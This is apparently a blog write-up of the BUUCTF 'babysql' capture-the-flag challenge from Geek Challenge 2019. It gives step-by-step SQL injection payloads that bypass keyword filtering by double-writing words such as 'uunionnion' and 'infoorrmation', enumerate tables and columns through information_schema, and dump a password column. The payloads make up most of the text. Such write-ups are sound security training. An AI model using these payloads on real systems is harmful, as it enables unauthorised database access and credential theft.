当前位置:网站首页>Buuctf's babysql[geek challenge 2019]
Buuctf's babysql[geek challenge 2019]
2022-06-13 00:27:00 【Golden silk】
Catalog
Closed number test
Try to login with universal password first
An error is reported when logging in , According to the error reporting statement , Should be or Deleted by filtering , Try double writing to bypass

Login successfully , It is determined that the closure number is ', Later tests found that , Filtered keywords can be bypassed by double spelling
Field number judgment

use order by The number of fields tested is 3, Then inject... With joint injection , structure payload
1' uunionnion sselectelect 1,2,3#
Keyword filtering determines
Determine echo location , Before joint injection , You have to look at filtering out the main keywords of joint injection , structure payload,
1' uunionnion sselectelect 1,'from','group_concat()'#
from No response , It's filtered out , Then continue to construct payload
1' uunionnion sselectelect 1,'information_schema.tables','where'# 
emm, Here is or Filtered out and where,
Explosion meter
structure payload
1' uunionnion sselectelect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema = database()# 
Then burst the field
1' uunionnion sselectelect 1,2,group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_schema = database() aandnd table_name = 'b4bsql'# 
Then check the value
1' uunionnion sselectelect 1,2,group_concat(passwoorrd) ffromrom b4bsql# 
Get flag
边栏推荐
- How to control the display and hiding of layergroup through transparency in leaflet
- Is the newly graduated college student taking BEC or PMP? PM who wants to transfer to another job in the future
- [Error] invalid use of incomplete type 使用了未定义的类型
- Delphi2009 connecting Oracle11g
- 进程间通信-共享内存shmat
- 6.824 Lab 1: MapReduce
- 63. 不同路径 II
- How to gracefully solve the offset problem of Baidu and Gaode maps in leaflet
- Transaction verification of btcd transaction process (2)
- TypeError: wave. ensureState is not a function
猜你喜欢

MASA Auth - 从用户的角度看整体设计
![BUUCTF之BabyUpload[GXYCTF2019]](/img/e8/202298b64d8764355fad348b50fee6.png)
BUUCTF之BabyUpload[GXYCTF2019]

The difference between caching and buffering

Using fastjson to solve the problem of returning an empty array from a null value of a field string object

vs studio_ How to use scanf in 2022

How to pass the PMP review?
![[matlab] matrix transformation and matrix evaluation](/img/71/b7614e2e4ea2dda0f44f0ea8bcbf45.png)
[matlab] matrix transformation and matrix evaluation

Can branches sign labor contracts with employees

【HCIE论述】组播IGMP-A

3、 Storage system
随机推荐
C language standard IO, for example: fread(), fwrite(), fgetc(), etc. (end)
BUUCTF之BabyUpload[GXYCTF2019]
[GXYCTF2019]禁止套娃--详解
What are the PMP scores?
Transaction creation of btcd transaction process (I)
ik分词器的安装
浏览器缓存的执行流程
Ad14 component pin name disappeared
New blog address
Is the PMP training organization an actual training?
Context of go concurrency mode
Will PM (Project Manager) take the PMP Exam?
[matlab] matrix
March 11, 2022 diary: Mr. Wang's spring, strange template mode
[LeetCode]14. Longest common prefix thirty-eight
APISpace 空号检测API接口 免费好用
Why does the PMP certificate need to be renewed and the renewal process?
[hcie discussion] STP-A
Packaging and uplink of btcd transaction process (III)
Using com0com/com2tcp to realize TCP to serial port (win10)